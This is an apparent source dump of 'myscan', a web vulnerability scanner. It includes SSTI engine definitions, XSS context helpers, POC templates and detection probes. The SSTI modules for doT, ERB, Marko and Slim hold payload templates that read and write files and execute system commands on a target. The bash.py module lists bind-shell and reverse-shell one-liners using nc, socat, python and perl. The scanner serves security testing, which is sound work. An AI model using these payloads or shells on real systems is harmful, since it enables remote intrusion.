PocBase(): 2 | 3 | def check_rule(self,dictdata,require): 4 | ''' 5 | check the rule is right 6 | ''' 7 | if require.get("type","tcp") != dictdata.get("type",None): 8 | return False 9 | result=False 10 | for dict_service in dictdata.get("service").keys(): 11 | if result: 12 | return True 13 | for require_service in require.get("service"): 14 | if dict_service.lower() in require_service.lower(): 15 | result=True 16 | break 17 | return result -------------------------------------------------------------------------------- /myscan/lib/hostscan/start_input.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.hostscan.input_sour.from_nmap_text_import import get_data_from_textfile 2 | from 
myscan.lib.hostscan.input_sour.from_json_import import get_data_from_jsonfile 3 | 4 | from myscan.lib.core.data import cmd_line_options, logger 5 | from myscan.lib.core.common import getredis 6 | import traceback, json 7 | 8 | 9 | def start_input(): 10 | if cmd_line_options.command == "hostscan": 11 | try: 12 | red = getredis() 13 | if cmd_line_options.input_nmaptext: 14 | datas = get_data_from_textfile(cmd_line_options.input_nmaptext) 15 | logger.info("input {} lines from nmap_text".format(len(datas))) 16 | for data in datas: 17 | red.lpush("hostdata", json.dumps(data)) 18 | if cmd_line_options.input_jsonfile: 19 | datas = get_data_from_jsonfile(cmd_line_options.input_jsonfile) 20 | logger.info("input {} lines from nmap_json".format(len(datas))) 21 | for data in datas: 22 | red.lpush("hostdata", json.dumps(data)) 23 | except Exception as ex: 24 | traceback.print_exc() 25 | logger.warning("input target to hostdata get error:{}".format(ex)) 26 | -------------------------------------------------------------------------------- /myscan/lib/parse/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/parse/__init__.py -------------------------------------------------------------------------------- /myscan/lib/parse/response_parser.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : response_parser.py 5 | 6 | from urllib import parse 7 | 8 | 9 | class response_parser(): 10 | ''' 11 | 此类解析处理rqeuests返回的的respose类 12 | ''' 13 | 14 | def __init__(self, r): 15 | self.data = r 16 | 17 | def getrequestraw(self): 18 | ''' 19 | return bytes[] 20 | ''' 21 | request_raw = "{} {} HTTP/1.1\r\n".format(self.data.request.method, self.data.request.path_url).encode() 22 | if self.data.request.headers.get("Host", None) is None: 23 | 
host = parse.urlparse(self.data.url).netloc 24 | request_raw += "Host: {}\r\n".format(host).encode() 25 | for k, v in self.data.request.headers.items(): 26 | request_raw += "{}: {}\r\n".format(k, v).encode() 27 | 28 | request_raw += b"\r\n" 29 | if self.data.request.body: 30 | if isinstance(self.data.request.body, str): 31 | request_raw += self.data.request.body.encode(errors="ignore") 32 | else: 33 | request_raw += self.data.request.body 34 | return request_raw 35 | 36 | def getresponseraw(self): 37 | ''' 38 | return bytes[] 39 | ''' 40 | response_raw = "HTTP/1.1 {} {}\r\n".format(self.data.status_code, self.data.reason).encode() 41 | for k, v in self.data.headers.items(): 42 | response_raw += "{}: {}\r\n".format(k, v).encode() 43 | response_raw += b"\r\n" 44 | response_raw += self.data.content 45 | return response_raw 46 | 47 | def geturl(self): 48 | return self.data.url.split("?")[0] 49 | -------------------------------------------------------------------------------- /myscan/lib/patch/ipv6_patch.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/19 3 | # @Author : caicai 4 | # @File : ipv6_patch.py 5 | 6 | import socket 7 | import urllib3 8 | from myscan.lib.core.data import cmd_line_options, logger 9 | 10 | 11 | def allowed_gai_family(): 12 | family = socket.AF_INET 13 | if cmd_line_options.ipv6: 14 | logger.debug("Using ipv6 priority") 15 | family = socket.AF_UNSPEC 16 | return family 17 | 18 | 19 | def ipv6_patch(): 20 | urllib3.util.connection.allowed_gai_family = allowed_gai_family 21 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-20 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- 
/myscan/lib/scriptlib/ssti/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-04-20
# @Author : caicai
# @File : __init__.py.py

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/closures.py:
--------------------------------------------------------------------------------
# Shared closures
#
# Each list holds candidate fragments that an engine context can substitute for
# ``%(closure)s`` in its ``prefix`` (see the ``set_contexts`` calls in the
# engine modules).  The engines only combine these strings; nothing here is
# executed locally.

close_single_duble_quotes = [ '1\'', '1"' ]
integer = [ '1' ]
string = [ '"1"' ]
close_dict = [ '}', ':1}' ]
close_function = [ ')' ]
close_list = [ ']' ]
empty = [ '' ]

# Python triple quotes and if and for loop termination.
close_triple_quotes = [ '1"""' ]
if_loops = [ ':' ]

# Javascript needs this to bypass assignations
var = [ 'a' ]

# Java needs booleans to bypass conditions and iterable objects
true_var = [ 'true' ]
iterable_var = [ '[1]' ]
--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/const.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-04-20
# @Author : caicai
# @File : const.py
from myscan.lib.core.common import get_random_num

# Random markers drawn once at import time, so every payload built in this
# process shares them.  ``rand_long1``/``rand_long2`` bracket the rendered
# expression so it can be located in a response; ``rand1``..``rand3`` feed the
# arithmetic check below.  They must be ints: ``rand2*rand3`` is evaluated
# when ``jinja2`` is built.
rand_long1 = get_random_num(10)
rand_long2 = get_random_num(10)
rand1 = get_random_num(3)
rand2 = get_random_num(3)
rand3 = get_random_num(3)

# Render spec for Jinja2-style ``{{ }}`` expressions.  Keys follow the layout
# of the engine classes' ``update_actions({'render': ...})`` dictionaries.
jinja2 = {
    'render' : {
        'render': '{{%(code)s}}',
        'header': '{{%(header)s}}',
        'trailer': '{{%(trailer)s}}',
        # Expression whose output identifies a real template evaluation.
        'test_render': '(%(n1)s,%(n2)s*%(n3)s)' % {
            'n1' : rand1,
            'n2' : rand2,
            'n3' : rand3
        },
        # What an engine that evaluated ``test_render`` prints: the str() of the
        # tuple ``(rand1, rand2*rand3)``.
        'test_render_expected': '%(res)s' % {
            'res' : (rand1, rand2 * rand3)
        }
    },
}


def generate_payload():
    """Build ``(payload, expected_substring)`` pairs for every render spec.

    The payload is ``header % rand_long1`` + ``render % test_render`` +
    ``trailer % rand_long2``; ``expected_substring`` is the spec's
    ``test_render_expected``.  Only ``jinja2`` is iterated at the moment.
    Returns a list of 2-tuples of str.
    """
    payloads = []
    for render in [jinja2]:
        r_ = render.get("render")
        p = r_.get("header") % ({"header": rand_long1}) + r_.get("render") % ({"code": r_.get("test_render")}) + r_.get("trailer") % ({"trailer": rand_long2})
        payloads.append(
            (p, r_.get("test_render_expected"))
        )
    return payloads

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-04-20
# @Author : caicai
# @File : __init__.py.py

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/dot.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import javascript


class Dot(javascript.Javascript):
    """doT engine definition (tplmap-style layout).

    ``init`` registers action templates and the escape contexts.  The
    ``render`` group (header/render/trailer wrappers) is the part used to build
    the reflection probe; the other groups are carried over from the upstream
    engine definition and nothing in the visible files references them.
    """

    def init(self):

        self.update_actions({
            'render' : {
                'render': '{{=%(code)s}}',
                'header': '{{=%(header)s}}',
                'trailer': '{{=%(trailer)s}}'
            },
            'write' : {
                'call' : 'inject',
                'write' : """{{=global.scan.mainModule.require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')}}""",
                'truncate' : """{{=global.scan.mainModule.require('fs').writeFileSync('%(path)s', '')}}"""
            },
            'read' : {
                'call': 'evaluate',
                'read' : """global.scan.mainModule.require('fs').readFileSync('%(path)s').toString('base64');"""
            },
            'md5' : {
                'call': 'evaluate',
                'md5': """global.scan.mainModule.require('crypto').createHash('md5').update(global.scan.mainModule.require('fs').readFileSync('%(path)s')).digest("hex");"""
            },
            'evaluate' : {
                'test_os': """global.scan.mainModule.require('os').platform()""",
            },
            'execute' : {
                'call': 'evaluate',
                'execute': """global.scan.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString());"""
            },
            'execute_blind' : {
                # The bogus prefix is to avoid false detection of Javascript instead of doT
                'call': 'inject',
                'execute_blind': """{{=''}}{{global.scan.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i');}}"""
            },
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            # Inside a {{ }} tag: close the current statement, then reopen one
            # in the suffix so the surrounding template stays well-formed.
            { 'level': 1, 'prefix': '%(closure)s;}}', 'suffix' : '{{1;', 'closures' : javascript.ctx_closures },

        ])


--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/erb.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import ruby


class Erb(ruby.Ruby):
    """ERB engine definition.  Same layout as ``Dot``; only the text context
    (level 0) is registered, the TODO below marks the missing ones."""

    def init(self):

        self.update_actions({
            'render' : {
                'render': '"#{%(code)s}"',
                'header': """<%%= '%(header)s'+""",
                'trailer': """+'%(trailer)s' %%>""",
            },
            'write' : {
                'call' : 'inject',
                'write': """<%%= require'base64';File.open('%(path)s', 'ab+') {|f| f.write(Base64.urlsafe_decode64('%(chunk_b64)s')) } %%>""",
                'truncate' : """<%%= File.truncate('%(path)s', 0) %%>"""
            },
            'evaluate_blind' : {
                'call': 'inject',
                'evaluate_blind': """<%%= require'base64';eval(Base64.urlsafe_decode64('%(code_b64)s'))&&sleep(%(delay)i) %%>"""
            },
            'execute_blind' : {
                'call': 'inject',
                'execute_blind': """<%%= require'base64';%%x(#{Base64.urlsafe_decode64('%(code_b64)s')+' && sleep %(delay)i'}) %%>"""
            },
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            # TODO: add contexts
        ])

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/mako.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import python

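class Mako(python.Python):
    """Mako engine definition: ``${ }`` render wrappers plus the escape
    contexts for expression tags, code blocks, control blocks and Mako
    block tags."""

    def init(self):

        self.update_actions({
            'render' : {
                'render': '${%(code)s}',
                'header': '${%(header)s}',
                'trailer': '${%(trailer)s}'
            },
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            # Normal reflecting tag ${}
            { 'level': 1, 'prefix': '%(closure)s}', 'suffix' : '', 'closures' : python.ctx_closures },

            # Code blocks
            # This covers <% %s %>, <%! %s %>, <% %s=1 %>
            { 'level': 1, 'prefix': '%(closure)s%%>', 'suffix' : '<%%#', 'closures' : python.ctx_closures },

            # If and for blocks
            # % if %s:\n% endif
            # % for a in %s:\n% endfor
            { 'level': 5, 'prefix': '%(closure)s#\n', 'suffix' : '\n', 'closures' : python.ctx_closures },

            # Mako blocks
            { 'level': 5, 'prefix' : '', 'suffix' : '<%%doc>' },
            { 'level': 5, 'prefix' : '', 'suffix' : '<%%def name="t(x)">', 'closures' : python.ctx_closures },
            { 'level': 5, 'prefix' : '', 'suffix' : '<%%block>', 'closures' : python.ctx_closures },
            { 'level': 5, 'prefix' : '', 'suffix' : '<%%text>', 'closures' : python.ctx_closures},

        ])
--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/marko.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import javascript



class Marko(javascript.Javascript):
    """Marko engine definition.  The ``render`` group builds the reflection
    probe; ``write``/``execute_blind`` are carried over from the upstream
    definition and are not referenced by the visible files."""

    def init(self):

        self.update_actions({
            'render' : {
                'render': '${%(code)s}',
                'header': '${"%(header)s"}',
                'trailer': '${"%(trailer)s"}',
            },
            'write' : {
                'call' : 'inject',
                'write' : """${require('fs').appendFileSync('%(path)s',Buffer('%(chunk_b64)s','base64'),'binary')}""",
                'truncate' : """${require('fs').writeFileSync('%(path)s','')}"""
            },
            'execute_blind' : {
                'call': 'inject',
                'execute_blind': """${require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i')}"""
            },
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            { 'level': 1, 'prefix': '%(closure)s}', 'suffix' : '${"1"', 'closures' : javascript.ctx_closures },

            # If escapes require to know the ending tag
            # (the example tags in the upstream comment did not survive this
            # copy of the file; the tag-attribute context below is what it
            # describes).
            { 'level': 2, 'prefix': '1/>', 'suffix' : '' },

        ])

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/slim.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import ruby



class Slim(ruby.Ruby):
    """Slim engine definition.  Only the text context is registered (see the
    TODO); ``write``/``evaluate_blind``/``execute_blind`` are carried over
    from the upstream definition."""

    def init(self):

        self.update_actions({
            'render' : {
                'render': '"#{%(code)s}"',
                'header': """=('%(header)s'+""",
                'trailer': """+'%(trailer)s')""",
            },
            'write' : {
                'call' : 'inject',
                'write': """=(require'base64';File.open('%(path)s', 'ab+') {|f| f.write(Base64.urlsafe_decode64('%(chunk_b64)s')) })""",
                'truncate' : """=(File.truncate('%(path)s', 0))"""
            },
            'evaluate_blind' : {
                'call': 'inject',
                'evaluate_blind': """=(require'base64';eval(Base64.urlsafe_decode64('%(code_b64)s'))&&sleep(%(delay)i))"""
            },
            'execute_blind' : {
                'call': 'inject',
                'execute_blind': """=(require'base64';%%x(#{Base64.urlsafe_decode64('%(code_b64)s')+' && sleep %(delay)i'}))"""
            },
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            # TODO: add contexts

        ])

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/engines/tornado.py:
--------------------------------------------------------------------------------
from myscan.lib.scriptlib.ssti.languages import python


from myscan.lib.scriptlib.ssti import rand

class Tornado(python.Python):
    """Tornado engine definition.

    ``test_render`` is a string-join expression built from two of
    ``rand.randstrings`` (generated once per process, see rand.py) and
    ``test_render_expected`` is the exact text a Tornado template would emit
    for it, so a match in a response identifies evaluation rather than echo.
    """

    def init(self):

        self.update_actions({
            'render' : {
                'render': '{{%(code)s}}',
                'header': '{{%(header)s}}',
                'trailer': '{{%(trailer)s}}',
                'test_render': """'%(s1)s'}}{%% raw '%(s1)s'.join('%(s2)s') %%}{{'%(s2)s'""" % {
                    's1' : rand.randstrings[0],
                    's2' : rand.randstrings[1]
                },
                'test_render_expected': '%(res)s' % {
                    'res' : rand.randstrings[0] + rand.randstrings[0].join(rand.randstrings[1]) + rand.randstrings[1]
                }
            }
        })

        self.set_contexts([

            # Text context, no closures
            { 'level': 0 },

            # This covers {{%s}}
            { 'level': 1, 'prefix': '%(closure)s}}', 'suffix' : '', 'closures' : python.ctx_closures },

            # This covers {% %s %}
            { 'level': 1, 'prefix': '%(closure)s%%}', 'suffix' : '', 'closures' : python.ctx_closures },

            # Comment blocks
            { 'level': 5, 'prefix' : '#}', 'suffix' : '{#' },
        ])

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/importssti.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-04-21
# @Author : caicai
# @File : importssti.py


from myscan.lib.scriptlib.ssti.engines.jinja2 import Jinja2
from myscan.lib.scriptlib.ssti.engines.dot import Dot
from myscan.lib.scriptlib.ssti.engines.twig import Twig
from myscan.lib.scriptlib.ssti.engines.ejs import Ejs
from myscan.lib.scriptlib.ssti.engines.erb import Erb
from myscan.lib.scriptlib.ssti.engines.mako import Mako
from myscan.lib.scriptlib.ssti.engines.marko import Marko
from myscan.lib.scriptlib.ssti.engines.nunjucks import Nunjucks
from myscan.lib.scriptlib.ssti.engines.pug import Pug
from myscan.lib.scriptlib.ssti.engines.slim import Slim
from myscan.lib.scriptlib.ssti.engines.smarty import Smarty
from myscan.lib.scriptlib.ssti.engines.tornado import Tornado
from myscan.lib.scriptlib.ssti.engines.velocity import Velocity
from myscan.lib.scriptlib.ssti.engines.freemarker import Freemarker
from myscan.lib.scriptlib.ssti.engines.dust import Dust
from myscan.lib.scriptlib.ssti.languages.javascript import Javascript
from myscan.lib.scriptlib.ssti.languages.php import Php
from myscan.lib.scriptlib.ssti.languages.python import Python
from myscan.lib.scriptlib.ssti.languages.ruby import Ruby
from myscan.lib.core.data import others,logger

# Engine classes whose payloads are collected, in the order they are tried.
plugins = [
    Smarty,
    Mako,
    Python,
    Tornado,
    Jinja2,
    Twig,
    Freemarker,
    Velocity,
    Slim,
    Erb,
    Pug,
    Nunjucks,
    Dot,
    Dust,
    Marko,
    Javascript,
    Php,
    Ruby,
    Ejs
]

def importssti():
    """Instantiate every engine in ``plugins`` and store the concatenation of
    their ``generate_payloads()`` results in ``others.ssti_payloads``.

    ``generate_payloads`` comes from the language base classes, which are not
    visible here (const.py's ``generate_payload`` is a different function and
    is not called from this module).  Any exception is reduced to a warning:
    in that case ``others.ssti_payloads`` is left untouched, so callers must
    not assume the attribute exists after this returns.
    """
    try:
        test_payloads = []
        for plugin in plugins:
            current_plugin = plugin()
            test_payloads += current_plugin.generate_payloads()
        others.ssti_payloads = test_payloads
        # logger.debug("import ssti payloads success")
    except Exception as ex:
        logger.warning("import ssti payloads error:{}".format(ex))


--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/languages/bash.py:
--------------------------------------------------------------------------------

# Shell command templates inherited from the upstream SSTI library.  None of
# the files visible in this dump reference ``bind_shell`` or
# ``reverse_shell``; a passive detection scanner only needs the render probes,
# so this module is a candidate for removal to keep the tool's footprint to
# what it actually uses.
echo = """echo '%(s1)s'"""

bind_shell = [
    """python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", %(port)s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("%(shell)s");s.close()'""",
    """nc -l -p %(port)s -e %(shell)s""",
    """rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc -l %(port)s >/tmp/f; rm -rf /tmp/f""",
    """socat tcp-l:%(port)s exec:%(shell)s"""
]

reverse_shell = [
    """sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc %(host)s %(port)s >/tmp/f""",
    """sleep 1; nc -e %(shell)s %(host)s %(port)s""",
    """sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%(shell)s","-i"]);'""",
    "sleep 1; /bin/bash -c \'%(shell)s 0&0 2>&0\'",
    """perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("%(shell)s -i");};'""",
    # TODO: ruby payload's broken, fix it.
    # """ruby -rsocket -e'f=TCPSocket.open("%(host)s",%(port)s).to_i;exec sprintf("%(shell)s -i <&%%d >&%%d 2>&%%d",f,f,f)'""",
    """sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("%(shell)s");'""",
]
--------------------------------------------------------------------------------
/myscan/lib/scriptlib/ssti/rand.py:
--------------------------------------------------------------------------------
import random
import string

# ``random`` is fine here: these values are detection markers that only need
# to be unlikely to occur in a page by chance, not secrets.

def randint_n(n):
    """Return a random integer with exactly ``n`` decimal digits.

    For ``n == 1`` the range starts at 2 rather than 1, so that a product
    such as ``1*8=8`` cannot reproduce one of its own operands and create a
    false positive when the rendered result is compared.
    """

    if n == 1:
        range_start = 2
    else:
        range_start = 10**(n-1)

    range_end = (10**n)-1
    return random.randint(range_start, range_end)

def randstr_n(n, chars=string.ascii_letters + string.digits):
    """Return a random string of length ``n`` drawn from ``chars``
    (alphanumerics by default)."""
    return ''.join(
        random.choice(chars) for _ in range(n)
    )

# Generate static random integers
# to help filling actions['render']
randints = [
    randint_n(3) for n in range(3)
]

# Generate static random strings
# to help filling actions['render']
randstrings = [
    randstr_n(3) for n in range(3)
]

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/xss/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-20
# @Author : caicai
# @File : __init__.py.py

--------------------------------------------------------------------------------
/myscan/lib/scriptlib/xss/jsContexter.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-20
# @Author : caicai
# @File : jsContexter.py

import re

from myscan.lib.scriptlib.xss.const import xsschecker


def stripper(string, substring, direction='right'):
    """Remove one occurrence of the single character ``substring`` from
    ``string``: the last one when ``direction == 'right'`` (the default), the
    first one otherwise.  The input is returned unchanged if the character is
    absent."""
    done = False
    strippedString = ''
    if direction == 'right':
        string = string[::-1]
    for char in string:
        if char == substring and not done:
            done = True
        else:
            strippedString += char
    if direction == 'right':
        strippedString = strippedString[::-1]
    return strippedString


def jsContexter(script):
    """Work out the characters needed to close the JavaScript constructs that
    are still open at the point where ``xsschecker`` appears in ``script``.

    Only the text before the marker is examined.  Balanced ``{...}``,
    ``(...)``, ``"..."`` and ``'...'`` spans are removed first; each remaining
    opener pushes its closer onto ``breaker`` and each remaining closer pops
    the matching one.  Returns the closers in the order they must be emitted
    (``breaker`` is built back-to-front, hence the final reversal).
    """
    broken = script.split(xsschecker)
    pre = broken[0]
    # remove everything that is between {..}, (..), "..." or '...'
    # (a single flags= argument: inline "(?s)" groups in the middle of a
    # pattern are rejected by re in Python 3.11+)
    pre = re.sub(r'\{.*?\}|\(.*?\)|".*?"|\'.*?\'', '', pre, flags=re.S)
    breaker = ''
    for num, char in enumerate(pre):  # iterate over the remaining characters
        if char == '{':
            breaker += '}'
        elif char == '(':
            breaker += ';)'  # yes, it should be ); but we will invert the whole thing later
        elif char == '[':
            breaker += ']'
        elif char == '/':
            try:
                if pre[num + 1] == '*':
                    breaker += '/*'
            except IndexError:
                pass
        elif char == '}':  # a } in the input already closes the block, so drop "our" }
            breaker = stripper(breaker, '}')
        elif char == ')':  # same for )
            breaker = stripper(breaker, ')')
        elif char == ']':  # same for ] (was comparing `breaker` instead of `char`, so ] was never handled)
            breaker = stripper(breaker, ']')
    return breaker[::-1]  # invert the breaker string

--------------------------------------------------------------------------------
/myscan/plugins/__init__.py:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/myscan/plugins/hostscan/__init__.py:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/myscan/plugins/webscan/__init__.py:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/myscan/pocs/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-06-13
# @Author : caicai
# @File : __init__.py.py

--------------------------------------------------------------------------------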
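/myscan/pocs/perfile/__template.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020-02-14
# @Author : caicai
# @File : __template.py

# Template for a per-file POC: copy this file as <pocname> and put your own
# logic in verify().
from myscan.lib.parse.dictdata_parser import dictdata_parser  # helper class for working with dictdata
from myscan.lib.parse.response_parser import response_parser  # helper class for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; recommended, it counts requests in redis
from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send  # socket helpers, if needed


class POC():
    """Per-file POC skeleton.  The framework constructs it with ``workdata``
    and calls ``verify()``; findings are appended to ``self.result``."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # Python dict; see the example dict in the docs development guide
        self.url = workdata.get("data")  # URL under test without its query string, e.g. https://www.baidu.com/index.php#tip1 (never ?keyword=1)
        self.result = []  # findings: each dict must carry name, url, level and detail, and detail must itself be a dict (see the append below)
        self.name = "your poc name"
        self.vulmsg = "your poc detail msg"
        self.level = 1  # 0:Low 1:Medium 2:High

    def verify(self):
        """Replace the body with the actual check; the append shows the
        finding shape the framework expects."""
        pass
        self.result.append({
            "name": self.name,
            "url": "http://example.com/test.php",
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
            }
        })

--------------------------------------------------------------------------------
/myscan/pocs/perfile/myscan_getpage.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-14
# @Author : caicai
# @File : myscan_getpage.py

'''
Do not delete this script.  It reports no findings of its own: it issues a GET
for the file through the wrapped request helper so that the search module can
inspect the response and report from there.
'''
from myscan.lib.helper.request import request

class POC():
    """Fetch-only POC; its value is the side effect of the request passing
    through the framework's response search."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # Python dict; see the example dict in the docs development guide
        self.url = workdata.get("data")  # URL under test (the original comment describes a directory URL ending in '/', as in the per-folder copy of this file)
        self.result = []  # findings: each dict must carry name, url, level and detail, and detail must itself be a dict
        self.name = "your poc name"
        self.level = 1  # 0:Low 1:Medium 2:High

    def verify(self):
        """GET ``self.url`` with the original request headers.  TLS
        verification is disabled and redirects are followed; the response is
        intentionally discarded here."""
        req = {
            "method": "GET",
            "url": self.url,
            "headers": self.dictdata.get("request").get("headers"),
            "timeout": 10,
            "verify": False,
            "allow_redirects": True,
        }
        r = request(**req)




--------------------------------------------------------------------------------
/myscan/pocs/perfile/myscan_webpack_leak.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-05-22
# @Author : caicai
# @File : myscan_webpack_leak.py

from myscan.lib.parse.dictdata_parser import dictdata_parser  # helper class for working with dictdata
from myscan.lib.parse.response_parser import response_parser  # helper class for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; recommended, it counts requests in redis
from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send  # socket helpers, if needed


class POC():
    """Detect exposed webpack source maps: for a ``.js`` file, request
    ``<url>.map`` and report when the body contains ``webpack:///`` paths."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # Python dict; see the example dict in the docs development guide
        self.url = workdata.get("data")  # URL under test without its query string, e.g. https://www.baidu.com/index.php#tip1 (never ?keyword=1)
        self.result = []  # findings: each dict must carry name, url, level and detail, and detail must itself be a dict
        self.name = "webpack source leak"
        self.vulmsg = "webpack源文件泄漏,可尝试reverse-sourcemap还原"
        self.level = 1  # 0:Low 1:Medium 2:High

    def verify(self):
        """Append a finding when ``self.url + ".map"`` returns a body
        containing ``webpack:///``.  Redirects are not followed, TLS
        verification is disabled; a ``None`` response (the wrapper's failure
        value) is treated as no finding."""
        # Only JavaScript files are checked.  The lookups are guarded so a
        # dictdata entry without "url"/"extension" skips the check instead of
        # raising AttributeError on None.
        url_info = self.dictdata.get("url") or {}
        extension = url_info.get("extension") or ""
        if extension.lower() not in ["js"]:
            return
        req = {
            "url": self.url + ".map",
            "method": "GET",
            "verify": False,
            "allow_redirects": False,
            "timeout": 10,
        }
        r = request(**req)
        if r is not None and b"webpack:///" in r.content:
            # parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    # "request": parser_.getrequestraw(),
                    # "response": parser_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/19
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/__poc_dedecms-cve-2018-7700-rce_2018.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-05-10
# @Author : caicai
# @File : __poc_dedecms-cve-2018-6910_2018.py

'Unverified'

from myscan.lib.parse.response_parser import response_parser  # helper class for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; recommended, it counts requests in redis
from myscan.config import scan_set
from myscan.lib.core.common import get_random_str


class POC():
    """DedeCMS fingerprint check: requests ``include/downmix.inc.php`` under
    the directory and reports when the response is the characteristic PHP
    fatal-error page.

    NOTE(review): the file name says cve-2018-7700 while ``self.name`` and the
    @File header say cve-2018-6910 — confirm which advisory this probe is
    meant to cover and make the three agree.  The module docstring marks the
    check as unverified.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # Python dict; see the example dict in the docs development guide
        self.url = workdata.get("data")  # directory URL under test, always ending in '/', e.g. https://www.baidu.com/home/
        self.result = []  # findings: each dict must carry name, url, level and detail, and detail must itself be a dict
        self.name = "dedecms-cve-2018-6910"
        self.vulmsg = '''referer:https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md'''
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Run the check for directories within the configured depth and
        append a finding (with raw request/response) on a match."""
        # Limit directory depth according to max_dir in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        req = {
            "method": "GET",
            "url": self.url + "include/downmix.inc.php",
            "headers": self.dictdata.get("request").get("headers"),
            "timeout": 10,
            "verify": False,
            "allow_redirects": False
        }
        r = request(**req)
        # All three markers must be present so that a generic error page does
        # not count as a hit.
        if r is not None and r.status_code == 200 and b"Fatal error" in r.content and b"downmix.inc.php" in r.content and b"Call to undefined function helper()" in r.content:
            parser_ = response_parser(r)
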